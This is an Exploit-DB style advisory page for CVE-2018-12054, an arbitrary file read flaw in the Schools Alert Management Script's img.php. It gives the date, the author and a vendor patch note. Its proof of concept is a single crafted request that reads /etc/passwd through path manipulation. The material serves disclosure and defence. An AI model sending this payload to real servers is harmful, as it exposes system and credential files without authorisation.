header-logo
Suggest Exploit
vendor:
Schools Alert Management System
by:
M3@Pandas

Schools Alert Management Script – Arbitrary File Read

The Schools Alert Management Script is vulnerable to an arbitrary file read vulnerability. An attacker can exploit this vulnerability by sending a crafted request to the img.php file with a malicious file path. This will allow the attacker to read any file on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the Schools Alert Management Script.
Source

Exploit-DB raw data:

# Exploit Title: Schools Alert Management Script - Arbitrary File Read
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/4
# Tested on: Linux Mint
# CVE: CVE-2018-12054

# Proof of Concept:

/img.php?f=/./etc/./passwd